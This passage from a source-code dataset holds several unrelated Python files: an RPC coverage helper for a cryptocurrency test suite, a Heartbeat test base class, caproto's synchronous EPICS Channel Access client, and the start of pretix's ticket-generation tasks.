MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Utilities for doing coverage analysis on the RPC interface.\n\nProvides a way to track which RPC commands are exercised during\ntesting.\n\"\"\"\n\nimport os\n\n\nREFERENCE_FILENAME = 'rpc_interface.txt'\n\n\nclass AuthServiceProxyWrapper(object):\n \"\"\"\n An object that wraps AuthServiceProxy to record specific RPC calls.\n\n \"\"\"\n def __init__(self, auth_service_proxy_instance, coverage_logfile=None):\n \"\"\"\n Kwargs:\n auth_service_proxy_instance (AuthServiceProxy): the instance\n being wrapped.\n coverage_logfile (str): if specified, write each service_name\n out to a file when called.\n\n \"\"\"\n self.auth_service_proxy_instance = auth_service_proxy_instance\n self.coverage_logfile = coverage_logfile\n\n def __getattr__(self, *args, **kwargs):\n return_val = self.auth_service_proxy_instance.__getattr__(\n *args, **kwargs)\n\n return AuthServiceProxyWrapper(return_val, self.coverage_logfile)\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Delegates to AuthServiceProxy, then writes the particular RPC method\n called to a file.\n\n \"\"\"\n return_val = self.auth_service_proxy_instance.__call__(*args, **kwargs)\n rpc_method = self.auth_service_proxy_instance._service_name\n\n if self.coverage_logfile:\n with open(self.coverage_logfile, 'a+', encoding='utf8') as f:\n f.write(\"%s\\n\" % rpc_method)\n\n return return_val\n\n @property\n def url(self):\n return self.auth_service_proxy_instance.url\n\n def __truediv__(self, relative_uri):\n return AuthServiceProxyWrapper(self.auth_service_proxy_instance / relative_uri)\n\ndef get_filename(dirname, n_node):\n \"\"\"\n Get a filename unique to the test process ID and node.\n\n This file will contain a list of RPC commands covered.\n \"\"\"\n pid = str(os.getpid())\n return os.path.join(\n dirname, \"coverage.pid%s.node%s.txt\" % (pid, str(n_node)))\n\n\ndef write_all_rpc_commands(dirname, node):\n \"\"\"\n Write out a list of all RPC functions available in `luk-cli` for\n coverage comparison. This will only happen once per coverage\n directory.\n\n Args:\n dirname (str): temporary test dir\n node (AuthServiceProxy): client\n\n Returns:\n bool. if the RPC interface file was written.\n\n \"\"\"\n filename = os.path.join(dirname, REFERENCE_FILENAME)\n\n if os.path.isfile(filename):\n return False\n\n help_output = node.help().split('\\n')\n commands = set()\n\n for line in help_output:\n line = line.strip()\n\n # Ignore blanks and headers\n if line and not line.startswith('='):\n commands.add(\"%s\\n\" % line.split()[0])\n\n with open(filename, 'w', encoding='utf8') as f:\n f.writelines(list(commands))\n\n return True\n"} {"ext": "py", "sha": "1a2f74bdf6cc1883c15b2549c51e4d7c863199ec", "content": "import sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../../libbeat/tests/system'))\n\nfrom beat.beat import TestCase\n\n\nclass BaseTest(TestCase):\n\n @classmethod\n def setUpClass(self):\n self.beat_name = \"heartbeat\"\n self.beat_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../../\"))\n"} {"ext": "py", "sha": "1a2f75412a30ffd04cdf8f15b9ac5bf891894100", "content": "# This module contains a synchronous implementation of a Channel Access client\n# as three top-level functions: read, write, subscribe. They are comparatively\n# simple and naive, with no caching or concurrency, and therefore less\n# performant but more robust.\nimport getpass\nimport inspect\nimport logging\nimport selectors\nimport socket\nimport threading # just to make callback processing thread-safe\nimport time\nimport weakref\n\nimport caproto as ca\n\nfrom .._dbr import ChannelType, SubscriptionType, field_types, native_type\nfrom .._utils import (CaprotoError, CaprotoTimeoutError, ErrorResponseReceived,\n adapt_old_callback_signature, get_environment_variables,\n safe_getsockname)\nfrom .repeater import spawn_repeater\n\n__all__ = ('read', 'write', 'subscribe', 'block', 'interrupt',\n 'read_write_read')\nlogger = logging.getLogger('caproto.ctx')\n\n# Make a dict to hold our tcp sockets.\nsockets = {}\nglobal_circuits = {}\n\n_permission_to_block = [] # mutable state shared by block and interrupt\n\n\n# Convenience functions that do both transport and caproto validation/ingest.\ndef send(circuit, command, pv_name=None):\n if pv_name is not None:\n tags = {'pv': pv_name}\n else:\n tags = None\n buffers_to_send = circuit.send(command, extra=tags)\n sockets[circuit].sendmsg(buffers_to_send)\n\n\ndef recv(circuit):\n bytes_received = sockets[circuit].recv(4096)\n commands, _ = circuit.recv(bytes_received)\n for c in commands:\n circuit.process_command(c)\n return commands\n\n\ndef search(pv_name, udp_sock, timeout, *, max_retries=2):\n # Set Broadcaster log level to match our logger.\n b = ca.Broadcaster(our_role=ca.CLIENT)\n b.client_address = safe_getsockname(udp_sock)\n\n # Send registration request to the repeater\n logger.debug('Registering with the Channel Access repeater.')\n bytes_to_send = b.send(ca.RepeaterRegisterRequest())\n\n env = get_environment_variables()\n repeater_port = env['EPICS_CA_REPEATER_PORT']\n\n client_address_list = ca.get_client_address_list()\n local_address = ca.get_local_address()\n\n try:\n udp_sock.sendto(bytes_to_send, (local_address, repeater_port))\n except OSError as exc:\n raise ca.CaprotoNetworkError(\n f\"Failed to send to {local_address}:{repeater_port}\") from exc\n\n logger.debug(\"Searching for %r....\", pv_name)\n commands = (\n ca.VersionRequest(0, ca.DEFAULT_PROTOCOL_VERSION),\n ca.SearchRequest(pv_name, 0, ca.DEFAULT_PROTOCOL_VERSION))\n bytes_to_send = b.send(*commands)\n tags = {'role': 'CLIENT',\n 'our_address': b.client_address,\n 'direction': '--->>>'}\n\n def send_search():\n for dest in client_address_list:\n tags['their_address'] = dest\n b.log.debug(\n '%d commands %dB',\n len(commands), len(bytes_to_send), extra=tags)\n try:\n udp_sock.sendto(bytes_to_send, dest)\n except OSError as exc:\n host, port = dest\n raise ca.CaprotoNetworkError(f\"Failed to send to {host}:{port}\") from exc\n\n def check_timeout():\n nonlocal retry_at\n\n if time.monotonic() >= retry_at:\n send_search()\n retry_at = time.monotonic() + retry_timeout\n\n if time.monotonic() - t > timeout:\n raise CaprotoTimeoutError(f\"Timed out while awaiting a response \"\n f\"from the search for {pv_name!r}. Search \"\n f\"requests were sent to this address list: \"\n f\"{ca.get_address_list()}.\")\n\n # Initial search attempt\n send_search()\n\n # Await a search response, and keep track of registration status\n retry_timeout = timeout / max((max_retries, 1))\n t = time.monotonic()\n retry_at = t + retry_timeout\n\n try:\n orig_timeout = udp_sock.gettimeout()\n udp_sock.settimeout(retry_timeout)\n while True:\n try:\n bytes_received, address = udp_sock.recvfrom(ca.MAX_UDP_RECV)\n except socket.timeout:\n check_timeout()\n continue\n\n check_timeout()\n\n commands = b.recv(bytes_received, address)\n b.process_commands(commands)\n for command in commands:\n if isinstance(command, ca.SearchResponse) and command.cid == 0:\n address = ca.extract_address(command)\n logger.debug('Found %r at %s:%d', pv_name, *address)\n return address\n else:\n # None of the commands we have seen are a reply to our request.\n # Receive more data.\n continue\n finally:\n udp_sock.settimeout(orig_timeout)\n\n\ndef make_channel(pv_name, udp_sock, priority, timeout):\n log = logging.LoggerAdapter(logging.getLogger('caproto.ch'), {'pv': pv_name})\n address = search(pv_name, udp_sock, timeout)\n try:\n circuit = global_circuits[(address, priority)]\n except KeyError:\n\n circuit = global_circuits[(address, priority)] = ca.VirtualCircuit(\n our_role=ca.CLIENT,\n address=address,\n priority=priority)\n\n chan = ca.ClientChannel(pv_name, circuit)\n new = False\n if chan.circuit not in sockets:\n new = True\n sockets[chan.circuit] = socket.create_connection(chan.circuit.address,\n timeout)\n circuit.our_address = sockets[chan.circuit].getsockname()\n try:\n if new:\n # Initialize our new TCP-based CA connection with a VersionRequest.\n send(chan.circuit, ca.VersionRequest(\n priority=priority,\n version=ca.DEFAULT_PROTOCOL_VERSION),\n pv_name)\n send(chan.circuit, chan.host_name(socket.gethostname()))\n send(chan.circuit, chan.client_name(getpass.getuser()))\n send(chan.circuit, chan.create(), pv_name)\n t = time.monotonic()\n while True:\n try:\n commands = recv(chan.circuit)\n if time.monotonic() - t > timeout:\n raise socket.timeout\n except socket.timeout:\n raise CaprotoTimeoutError(\"Timeout while awaiting channel \"\n \"creation.\")\n tags = {'direction': '<<<---',\n 'our_address': chan.circuit.our_address,\n 'their_address': chan.circuit.address}\n for command in commands:\n if isinstance(command, ca.Message):\n tags['bytesize'] = len(command)\n logger.debug(\"%r\", command, extra=tags)\n elif command is ca.DISCONNECTED:\n raise CaprotoError('Disconnected during initialization')\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n log.info(\"Channel connected.\")\n break\n\n except BaseException:\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n raise\n return chan\n\n\ndef _read(chan, timeout, data_type, data_count, notify, force_int_enums):\n logger = chan.log\n logger.debug(\"Detected native data_type %r.\", chan.native_data_type)\n ntype = native_type(chan.native_data_type) # abundance of caution\n if ((ntype is ChannelType.ENUM) and\n (data_type is None) and (not force_int_enums)):\n logger.debug(\"Changing requested data_type to STRING.\")\n data_type = ChannelType.STRING\n req = chan.read(data_type=data_type, data_count=data_count, notify=notify)\n send(chan.circuit, req, chan.name)\n t = time.monotonic()\n while True:\n try:\n commands = recv(chan.circuit)\n except socket.timeout:\n commands = []\n\n if time.monotonic() - t > timeout:\n raise CaprotoTimeoutError(\"Timeout while awaiting reading.\")\n\n tags = {'direction': '<<<---',\n 'our_address': chan.circuit.our_address,\n 'their_address': chan.circuit.address}\n for command in commands:\n if isinstance(command, ca.Message):\n tags['bytesize'] = len(command)\n logger.debug(\"%r\", command, extra=tags)\n if (isinstance(command, (ca.ReadResponse, ca.ReadNotifyResponse)) and\n command.ioid == req.ioid):\n return command\n elif isinstance(command, ca.ErrorResponse):\n raise ErrorResponseReceived(command)\n elif command is ca.DISCONNECTED:\n raise CaprotoError('Disconnected while waiting for '\n 'read response')\n\n\ndef read(pv_name, *, data_type=None, data_count=None, timeout=1, priority=0,\n notify=True, force_int_enums=False, repeater=True):\n \"\"\"\n Read a Channel.\n\n Parameters\n ----------\n pv_name : str\n The PV name to read from\n data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n Request specific data type or a class of data types, matched to the\n channel's native data type. Default is Channel's native data type.\n data_count : integer, optional\n Requested number of values. Default is the channel's native data\n count.\n timeout : float, optional\n Default is 1 second.\n priority : 0, optional\n Virtual Circuit priority. Default is 0, lowest. Highest is 99.\n notify : boolean, optional\n Send a ReadNotifyRequest instead of a ReadRequest. True by default.\n force_int_enums : boolean, optional\n Retrieve enums as integers. (Default is strings.)\n repeater : boolean, optional\n Spawn a Channel Access Repeater process if the port is available.\n True default, as the Channel Access spec stipulates that well-behaved\n clients should do this.\n\n Returns\n -------\n response : ReadResponse or ReadNotifyResponse\n\n Examples\n --------\n\n Get the value of a Channel named 'simple:A'.\n\n >>> read('simple:A').data\n array([1], dtype=int32)\n\n Request a richer Channel Access data type that includes the timestamp, and\n access the timestamp.\n\n >>> read('cat', data_type='time').metadata.timestmap\n 1570622339.042392\n\n A convenience method is provided for access the timestamp as a Python\n datetime object.\n\n >>> read('cat' data_type='time').metadata.stamp.as_datetime()\n datetime.datetime(2019, 10, 9, 11, 58, 59, 42392)\n\n The requested data type may also been given as a specific Channel Access\n type\n\n >>> from caproto import ChannelType\n >>> read('cat', data_type=ChannelType.CTRL_FLOAT).metadata\n DBR_CTRL_FLOAT(\n status=,\n severity=,\n upper_disp_limit=0.0,\n lower_disp_limit=0.0,\n upper_alarm_limit=0.0,\n upper_warning_limit=0.0,\n lower_warning_limit=0.0,\n lower_alarm_limit=0.0,\n upper_ctrl_limit=0.0,\n lower_ctrl_limit=0.0,\n precision=0,\n units=b'')\n\n or the corresponding integer identifer\n\n >>> read('cat', data_type=30).metadata\n DBR_CTRL_FLOAT(\n status=,\n severity=,\n upper_disp_limit=0.0,\n lower_disp_limit=0.0,\n upper_alarm_limit=0.0,\n upper_warning_limit=0.0,\n lower_warning_limit=0.0,\n lower_alarm_limit=0.0,\n upper_ctrl_limit=0.0,\n lower_ctrl_limit=0.0,\n precision=0,\n units=b'')\n \"\"\"\n if repeater:\n # As per the EPICS spec, a well-behaved client should start a\n # caproto-repeater that will continue running after it exits.\n spawn_repeater()\n udp_sock = ca.bcast_socket()\n # Must bind or getsocketname() will raise on Windows.\n # See https://github.com/caproto/caproto/issues/514.\n udp_sock.bind(('', 0))\n try:\n udp_sock.settimeout(timeout)\n chan = make_channel(pv_name, udp_sock, priority, timeout)\n finally:\n udp_sock.close()\n try:\n return _read(chan, timeout, data_type=data_type, data_count=data_count,\n notify=notify, force_int_enums=force_int_enums)\n finally:\n try:\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n send(chan.circuit, chan.clear(), chan.name)\n finally:\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n\n\ndef subscribe(pv_name, priority=0, data_type=None, data_count=None,\n low=0.0, high=0.0, to=0.0, mask=None):\n \"\"\"\n Define a subscription.\n\n Parameters\n ----------\n pv_name : string\n The PV name to subscribe to\n priority : integer, optional\n Used by the server to triage subscription responses when under high\n load. 0 is lowest; 99 is highest.\n data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n Request specific data type or a class of data types, matched to the\n channel's native data type. Default is Channel's native data type.\n data_count : integer, optional\n Requested number of values. Default is the channel's native data\n count, which can be checked in the Channel's attribute\n :attr:`native_data_count`.\n low, high, to : float, optional\n deprecated by Channel Access, not yet implemented by caproto\n mask : SubscriptionType, optional\n Subscribe to selective updates.\n\n Examples\n --------\n\n Define a subscription on the ``random_walk:x`` PV.\n\n >>> sub = subscribe('random_walk:x')\n\n Add one or more user-defined callbacks to process responses.\n\n >>> def f(sub, response):\n ... print(repsonse.data)\n ...\n >>> sub.add_callback(f)\n\n Activate the subscription and process incoming responses.\n\n >>> sub.block()\n\n This is a blocking operation in the sync client. (To do this on a\n background thread, use the threading client.) Interrupt using Ctrl+C or\n by calling :meth:`sub.interrupt()` from another thread.\n\n The subscription may be reactivated by calling ``sub.block()`` again.\n\n To process multiple subscriptions at once, use the *function*\n :func:`block`, which takes one or more Subscriptions as arguments.\n\n >>> block(sub1, sub2)\n\n There is also an :func:`interrupt` function, which is merely an alias to\n the method.\n \"\"\"\n return Subscription(pv_name, priority, data_type, data_count, low, high,\n to, mask)\n\n\ndef interrupt():\n \"\"\"\n Signal to :func:`block` to stop blocking. Idempotent.\n\n This obviously cannot be called interactively while blocked;\n it is intended to be called from another thread.\n \"\"\"\n _permission_to_block.clear()\n\n\ndef block(*subscriptions, duration=None, timeout=1, force_int_enums=False,\n repeater=True):\n \"\"\"\n Activate one or more subscriptions and process incoming responses.\n\n Use Ctrl+C (SIGINT) to escape, or from another thread, call\n :func:`interrupt()`.\n\n Parameters\n ----------\n *subscriptions : Subscriptions\n The list of subscriptions.\n duration : float, optional\n How many seconds to run for. Run forever (None) by default.\n timeout : float, optional\n Default is 1 second. This is not the same as `for`; this is the timeout\n for failure in the event of no connection.\n force_int_enums : boolean, optional\n Retrieve enums as integers. (Default is strings.)\n repeater : boolean, optional\n Spawn a Channel Access Repeater process if the port is available.\n True default, as the Channel Access spec stipulates that well-behaved\n clients should do this.\n\n Examples\n --------\n\n Activate subscription(s) and block while they process updates.\n\n >>> sub1 = subscribe('cat')\n >>> sub1 = subscribe('dog')\n >>> block(sub1, sub2)\n \"\"\"\n _permission_to_block.append(object())\n if duration is not None:\n deadline = time.time() + duration\n else:\n deadline = None\n if repeater:\n # As per the EPICS spec, a well-behaved client should start a\n # caproto-repeater that will continue running after it exits.\n spawn_repeater()\n loggers = {}\n for sub in subscriptions:\n loggers[sub.pv_name] = logging.LoggerAdapter(logging.getLogger('caproto.ch'),\n {'pv': sub.pv_name})\n udp_sock = ca.bcast_socket()\n # Must bind or getsocketname() will raise on Windows.\n # See https://github.com/caproto/caproto/issues/514.\n udp_sock.bind(('', 0))\n try:\n udp_sock.settimeout(timeout)\n channels = {}\n for sub in subscriptions:\n pv_name = sub.pv_name\n chan = make_channel(pv_name, udp_sock, sub.priority, timeout)\n channels[sub] = chan\n finally:\n udp_sock.close()\n try:\n # Subscribe to all the channels.\n sub_ids = {}\n for sub, chan in channels.items():\n loggers[chan.name].debug(\"Detected native data_type %r.\",\n chan.native_data_type)\n\n # abundance of caution\n ntype = field_types['native'][chan.native_data_type]\n if ((ntype is ChannelType.ENUM) and (not force_int_enums)):\n ntype = ChannelType.STRING\n time_type = field_types['time'][ntype]\n # Adjust the timeout during monitoring.\n sockets[chan.circuit].settimeout(None)\n loggers[chan.name].debug(\"Subscribing with data_type %r.\",\n time_type)\n req = chan.subscribe(\n data_type=time_type, data_count=sub.data_count, mask=sub.mask)\n send(chan.circuit, req, chan.name)\n sub_ids[(chan.circuit, req.subscriptionid)] = sub\n logger.debug('Subscribed. Building socket selector.')\n try:\n circuits = set(chan.circuit for chan in channels.values())\n selector = selectors.DefaultSelector()\n sock_to_circuit = {}\n for circuit in circuits:\n sock = sockets[circuit]\n sock_to_circuit[sock] = circuit\n selector.register(sock, selectors.EVENT_READ)\n if duration is None:\n logger.debug('Continuing until SIGINT is received....')\n while True:\n events = selector.select(timeout=0.1)\n if deadline is not None and time.time() > deadline:\n logger.debug('Deadline reached.')\n return\n if not _permission_to_block:\n logger.debug(\"Interrupted via \"\n \"caproto.sync.client.interrupt().\")\n break\n for selector_key, _ in events:\n circuit = sock_to_circuit[selector_key.fileobj]\n commands = recv(circuit)\n for response in commands:\n if isinstance(response, ca.ErrorResponse):\n raise ErrorResponseReceived(response)\n if response is ca.DISCONNECTED:\n # TODO Re-connect.\n raise CaprotoError(\"Disconnected\")\n sub = sub_ids.get((circuit, response.subscriptionid))\n if sub:\n sub.process(response)\n except KeyboardInterrupt:\n logger.debug('Received SIGINT. Closing.')\n pass\n finally:\n _permission_to_block.clear()\n try:\n for chan in channels.values():\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n send(chan.circuit, chan.clear(), chan.name)\n finally:\n # Reinstate the timeout for channel cleanup.\n for chan in channels.values():\n sockets[chan.circuit].settimeout(timeout)\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n\n\ndef _write(chan, data, metadata, timeout, data_type, notify):\n logger.debug(\"Detected native data_type %r.\", chan.native_data_type)\n # abundance of caution\n ntype = field_types['native'][chan.native_data_type]\n if (data_type is None) and (ntype is ChannelType.ENUM):\n # Change data_type to STRING if data contains string-like data, or\n # iterable of string-like data\n stringy_data = False\n if isinstance(data, (str, bytes)):\n stringy_data = True\n if hasattr(data, '__getitem__') \\\n and len(data) > 0 \\\n and isinstance(data[0], (str, bytes)):\n stringy_data = True\n\n if stringy_data:\n logger.debug(\"Will write to ENUM as data_type STRING.\")\n data_type = ChannelType.STRING\n logger.debug(\"Writing.\")\n req = chan.write(data=data, notify=notify,\n data_type=data_type, metadata=metadata)\n send(chan.circuit, req, chan.name)\n t = time.monotonic()\n if notify:\n while True:\n try:\n commands = recv(chan.circuit)\n except socket.timeout:\n commands = []\n\n if time.monotonic() - t > timeout:\n raise CaprotoTimeoutError(\"Timeout while awaiting write reply.\")\n\n tags = {'direction': '<<<---',\n 'our_address': chan.circuit.our_address,\n 'their_address': chan.circuit.address}\n for command in commands:\n if isinstance(command, ca.Message):\n tags['bytesize'] = len(command)\n logger.debug(\"%r\", command, extra=tags)\n if (isinstance(command, ca.WriteNotifyResponse) and\n command.ioid == req.ioid):\n response = command\n break\n elif isinstance(command, ca.ErrorResponse):\n raise ErrorResponseReceived(command)\n elif command is ca.DISCONNECTED:\n raise CaprotoError('Disconnected while waiting for '\n 'write response')\n else:\n continue\n break\n return response\n else:\n return None\n\n\ndef write(pv_name, data, *, notify=False, data_type=None, metadata=None,\n timeout=1, priority=0,\n repeater=True):\n \"\"\"\n Write to a Channel.\n\n Parameters\n ----------\n pv_name : str\n The PV name to write to\n data : str, bytes, int, or float or any Iterable of these\n Value(s) to write.\n notify : boolean, optional\n Request notification of completion and wait for it. False by default.\n data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n Write as specific data type. Default is inferred from input.\n metadata : ``ctypes.BigEndianStructure`` or tuple\n Status and control metadata for the values\n timeout : float, optional\n Default is 1 second.\n priority : 0, optional\n Virtual Circuit priority. Default is 0, lowest. Highest is 99.\n repeater : boolean, optional\n Spawn a Channel Access Repeater process if the port is available.\n True default, as the Channel Access spec stipulates that well-behaved\n clients should do this.\n\n Returns\n -------\n initial, final : tuple of ReadNotifyResponse objects\n\n Examples\n --------\n Write the value 5 to a Channel named 'simple:A'.\n\n >>> write('simple:A', 5) # returns None\n\n Request notification of completion (\"put completion\") and wait for it.\n >>> write('cat', 5, notify=True) # blocks until complete, then returns:\n WriteNotifyResponse(\n data_type=,\n data_count=1,\n status=CAStatusCode(\n name='ECA_NORMAL', code=0, code_with_severity=1,\n severity=,\n success=1, defunct=False,\n description='Normal successful completion'),\n ioid=0)\n \"\"\"\n if repeater:\n # As per the EPICS spec, a well-behaved client should start a\n # caproto-repeater that will continue running after it exits.\n spawn_repeater()\n\n udp_sock = ca.bcast_socket()\n # Must bind or getsocketname() will raise on Windows.\n # See https://github.com/caproto/caproto/issues/514.\n udp_sock.bind(('', 0))\n try:\n udp_sock.settimeout(timeout)\n chan = make_channel(pv_name, udp_sock, priority, timeout)\n finally:\n udp_sock.close()\n try:\n return _write(chan, data, metadata, timeout, data_type, notify)\n finally:\n try:\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n send(chan.circuit, chan.clear(), chan.name)\n finally:\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n\n\ndef read_write_read(pv_name, data, *, notify=False,\n read_data_type=None, write_data_type=None,\n metadata=None, timeout=1, priority=0,\n force_int_enums=False, repeater=True):\n \"\"\"\n Write to a Channel, but sandwich the write between to reads.\n\n This is what the command-line utilities ``caproto-put`` and ``caput`` do.\n Notice that if you want the second reading to reflect the written value,\n you should pass the parameter ``notify=True``. (This is also true of\n ``caproto-put``/``caput``, which needs the ``-c`` argument to behave the\n way you might expect it to behave.)\n\n This is provided as a separate function in order to support ``caproto-put``\n efficiently. Making separate calls to :func:`read` and :func:`write` would\n re-create a connection redundantly.\n\n Parameters\n ----------\n pv_name : str\n The PV name to write/read/write\n data : str, bytes, int, or float or any Iterable of these\n Value to write.\n notify : boolean, optional\n Request notification of completion and wait for it. False by default.\n read_data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n Request specific data type.\n write_data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n Write as specific data type. Default is inferred from input.\n metadata : ``ctypes.BigEndianStructure`` or tuple\n Status and control metadata for the values\n timeout : float, optional\n Default is 1 second.\n priority : 0, optional\n Virtual Circuit priority. Default is 0, lowest. Highest is 99.\n force_int_enums : boolean, optional\n Retrieve enums as integers. (Default is strings.)\n repeater : boolean, optional\n Spawn a Channel Access Repeater process if the port is available.\n True default, as the Channel Access spec stipulates that well-behaved\n clients should do this.\n\n Returns\n -------\n initial, write_response, final : tuple of response\n\n The middle response comes from the write, and it will be ``None`` unless\n ``notify=True``.\n\n Examples\n --------\n\n Write the value 5 to a Channel named 'simple:A'.\n\n >>> read_write_read('cat', 5) # returns initial, None, final\n\n Request notification of completion (\"put completion\") and wait for it.\n\n >>> read_write_read('cat', 5, notify=True) # initial, WriteNotifyResponse, final\n \"\"\"\n if repeater:\n # As per the EPICS spec, a well-behaved client should start a\n # caproto-repeater that will continue running after it exits.\n spawn_repeater()\n\n udp_sock = ca.bcast_socket()\n # Must bind or getsocketname() will raise on Windows.\n # See https://github.com/caproto/caproto/issues/514.\n udp_sock.bind(('', 0))\n try:\n udp_sock.settimeout(timeout)\n chan = make_channel(pv_name, udp_sock, priority, timeout)\n finally:\n udp_sock.close()\n try:\n initial = _read(chan, timeout, read_data_type, None, notify=True,\n force_int_enums=force_int_enums)\n res = _write(chan, data, metadata, timeout, write_data_type, notify)\n final = _read(chan, timeout, read_data_type, None, notify=True,\n force_int_enums=force_int_enums)\n finally:\n try:\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n send(chan.circuit, chan.clear(), chan.name)\n finally:\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n return initial, res, final\n\n\nclass Subscription:\n \"\"\"\n This object encapsulates state related to a Subscription.\n\n See the :func:`subscribe` function.\n \"\"\"\n def __init__(self, pv_name, priority=0, data_type=None, data_count=None,\n low=0.0, high=0.0, to=0.0, mask=None):\n if mask is None:\n mask = SubscriptionType.DBE_VALUE | SubscriptionType.DBE_ALARM\n self.pv_name = pv_name\n self.priority = priority\n self.data_type = data_type\n self.data_count = data_count\n self.low = low\n self.high = high\n self.to = to\n self.mask = mask\n\n self.callbacks = {}\n self._callback_id = 0\n self._callback_lock = threading.RLock()\n\n # This is related to back-compat for user callbacks that have the old\n # signature, f(response).\n self.__wrapper_weakrefs = set()\n\n def block(self, duration=None, timeout=1,\n force_int_enums=False,\n repeater=True):\n \"\"\"\n Activate one or more subscriptions and process incoming responses.\n\n Use Ctrl+C (SIGINT) to escape, or from another thread, call\n :meth:`interrupt()`.\n\n Convenience alias for the top-level function :func:`block`, which may\n be used to process multiple Subscriptions concurrently.\n\n Parameters\n ----------\n\n duration : float, optional\n How many seconds to run for. Run forever (None) by default.\n timeout : float, optional\n Default is 1 second. This is not the same as `for`; this is the\n timeout for failure in the event of no connection.\n force_int_enums : boolean, optional\n Retrieve enums as integers. (Default is strings.)\n repeater : boolean, optional\n Spawn a Channel Access Repeater process if the port is available.\n True default, as the Channel Access spec stipulates that\n well-behaved clients should do this.\n \"\"\"\n block(self, duration=duration, timeout=timeout,\n force_int_enums=force_int_enums,\n repeater=repeater)\n\n def interrupt(self):\n \"\"\"\n Signal to block() to stop blocking. Idempotent.\n\n This obviously cannot be called interactively while blocked;\n it is intended to be called from another thread.\n This method is a convenience alias for the top-level function\n :func:`interrupt`.\n \"\"\"\n interrupt()\n\n def add_callback(self, func):\n \"\"\"\n Add a callback to receive responses.\n\n Parameters\n ----------\n func : callable\n Expected signature: ``func(sub, response)``.\n\n The signature ``func(response)`` is also supported for\n backward-compatibility but will issue warnings. Support will be\n removed in a future release of caproto.\n\n Returns\n -------\n token : int\n Integer token that can be passed to :meth:`remove_callback`.\n\n .. versionchanged:: 0.5.0\n\n Changed the expected signature of ``func`` from ``func(response)``\n to ``func(sub, response)``.\n \"\"\"\n func = adapt_old_callback_signature(func, self.__wrapper_weakrefs)\n\n def removed(_):\n self.remove_callback(cb_id)\n\n if inspect.ismethod(func):\n ref = weakref.WeakMethod(func, removed)\n else:\n # TODO: strong reference to non-instance methods?\n ref = weakref.ref(func, removed)\n\n with self._callback_lock:\n cb_id = self._callback_id\n self._callback_id += 1\n self.callbacks[cb_id] = ref\n return cb_id\n\n def remove_callback(self, cb_id):\n \"\"\"\n Remove callback using token that was returned by :meth:`add_callback`.\n \"\"\"\n with self._callback_lock:\n self.callbacks.pop(cb_id, None)\n\n def process(self, response):\n \"\"\"\n Run the callbacks on a response.\n\n This is used internally by :func:`block()`, generally not called by the\n user.\n \"\"\"\n to_remove = []\n with self._callback_lock:\n callbacks = list(self.callbacks.items())\n\n for cb_id, ref in callbacks:\n callback = ref()\n if callback is None:\n to_remove.append(cb_id)\n continue\n\n callback(self, response)\n\n with self._callback_lock:\n for remove_id in to_remove:\n self.callbacks.pop(remove_id, None)\n\n def clear(self):\n \"\"\"\n Remove all callbacks. If currently blocking, interrupt.\n \"\"\"\n interrupt()\n with self._callback_lock:\n for cb_id in list(self.callbacks):\n self.remove_callback(cb_id)\n"} {"ext": "py", "sha": "1a2f762ca989b7431a3a975f650627d70488c10b", "content": "import logging\nimport os\n\nfrom django.core.files.base import ContentFile\nfrom django.utils.timezone import now\nfrom django.utils.translation import ugettext as _\nfrom django_scopes import scopes_disabled\n\nfrom pretix.base.i18n import language\nfrom pretix.base.models import (\n CachedCombinedTicket, CachedTicket, Event, InvoiceAddress, Order,\n OrderPosition,\n)\nfrom pretix.base.services.tasks import EventTask, ProfiledTask\nfrom pretix.base.settings import PERSON_NAME_SCHEMES\nfrom pretix.base.signals import allow_ticket_download, register_ticket_outputs\nfrom pretix.celery_app import app\nfrom pretix.helpers.database import rolledback_transaction\n\nlogger = logging.getLogger(__name__)\n\n\ndef generate_orderposition(order_position: int, provider: str):\n order_position = OrderPosition.objects.select_related('order', 'order__event').get(id=order_position)\n\n with language(order_position.order.locale):\n responses = register_ticket_outputs.send(order_position.order.event)\n for receiver, response in responses:\n prov = response(order_position.order.event)\n if prov.identifier == provider:\n filename, ttype, data = prov.generate(order_position)\n path, ext = os.path.splitext(filename)\n for ct in CachedTicket.objects.filter(order_position=order_position, provider=provider):\n ct.delete()\n ct = CachedTicket.objects.create(order_position=order_position, provider=provider,\n extension=ext, type=ttype, file=None)\n ct.file.save(filename, ContentFile(data))\n return ct.pk\n\n\ndef generate_order(order: int, provider: str):\n order = Order.objects.select_related('event').get(id=order)\n\n with language(order.locale):\n responses = register_ticket_outputs.send(order.event)\n for receiver, response in responses:\n prov = response(order.event)\n if prov.identifier == provider:\n filename, ttype, data = prov.generate_order(order)\n if ttype == 'text/uri-list':\n continue\n\n path, ext = os.path.splitext(filename)\n for ct in CachedCombinedTicket.objects.filter(order=order, provider=provider):\n ct.delete()\n ct = CachedCombinedTicket.objects.create(order=order, provider=provider, extension=ext,\n type=ttype, file=None)\n ct.file.save(filename, ContentFile(data))\n return ct.pk\n\n\n@app.task(base=ProfiledTask)\ndef generate(model: str, pk: int, provider: str):\n with scopes_disabled():\n if model == 'order':\n return generate_order(pk, provider)\n elif model == 'orderposition':\n return generate_orderposition(pk, provider)\n\n\nclass DummyRollbackException(Exception):\n pass\n\n\ndef preview(event: 